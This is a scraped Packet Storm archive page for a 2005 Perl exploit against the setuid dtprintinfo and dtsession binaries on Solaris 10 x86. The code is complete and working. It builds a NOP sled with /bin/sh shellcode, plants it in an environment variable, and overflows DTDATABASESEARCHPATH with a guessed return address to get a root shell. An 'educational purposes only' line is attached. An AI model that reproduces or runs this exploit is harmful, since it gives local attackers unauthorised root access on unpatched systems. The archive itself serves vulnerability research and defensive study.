what you don't know can hurt you

x_dtsuids.pl.txt

x_dtsuids.pl.txt
Posted Nov 8, 2005
Authored by Charles Stevenson

Solaris 10 DtPrintinfo/Session exploit for x86.

tags | exploit, x86
systems | solaris
MD5 | 3eac0baa42e886142249fb50bf8cc94b

x_dtsuids.pl.txt

Change Mirror Download
#!/usr/bin/perl 
#######################################################################
#
# Solaris 10 DtPrintinfo/Session Exploit (x86)
#
# EDUCATIONAL purposes only.... :-)
#
# by Charles Stevenson (core) <core@bokeoa.com>
#
# greetz to raptor for sharing this vulnerability and in no specific
# order just want to show love for: nemo, andrewg, jduck, bannedit,
# runixd, charbuff, sloth, ktha, KF, akt0r, MRX, salvia, etc.
#
# irc.pulltheplug.org (#social)
# 0dd: much <3 & respect
#
# 10/12/05 - FF local root
#
#######################################################################
# PRIVATE - DO NOT DISTRIBUTE - PRIVATE #
#######################################################################

#You can try lots of dt* suids. I'm too lazy to code the loop ;-o
$dtsuid = "dtprintinfo";
#$dtsuid = "dtsession";

$sc = "\x90" x (511-108) .

# anathema <anathema@hack.co.za>
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04".
"\xc3\xeb\x05\xe8\xf9\xff\xff\xff\x5e".
"\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50".
"\xb0\x8d\xe8\xe0\xff\xff\xff\x29\xc0".
"\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb".
"\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0".
"\x88\x46\x19\x89\x46\x14\x89\x46\x0f".
"\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51".
"\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff".
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01".
"\x01\x01\x01\x02\x02\x02\x02\x03\x03".
"\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

print "\n\n$dtsuid root exploit\n";
print "----------------------------------------------\n";
print "Written by Charles Stevenson <core\@bokeoa.com>\n\n";

# Clear out the environment.
foreach $key (keys %ENV) { delete $ENV{$key}; }

# Setup simple env so ret is easier to guess
$ENV{"HELLCODE"} = "$sc";
$ENV{"TERM"} = "xterm";
$ENV{"DISPLAY"} = "127.0.0.1:0";
$ENV{"PATH"} = "/usr/dt/bin:/bin:/sbin:/usr/sbin:/usr/bin";

# Create the payload...
#$ENV{"DTDATABASESEARCHPATH"} = "////" . "ABCD"x360; # raptor
$ENV{"DTDATABASESEARCHPATH"} = "////" . pack("l",0x8047890)x360;


# If you don't get root try other dt setuid binaries
print "Trying to own $dtsuid...\n";
system("/usr/dt/bin/$dtsuid");

# EOF

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close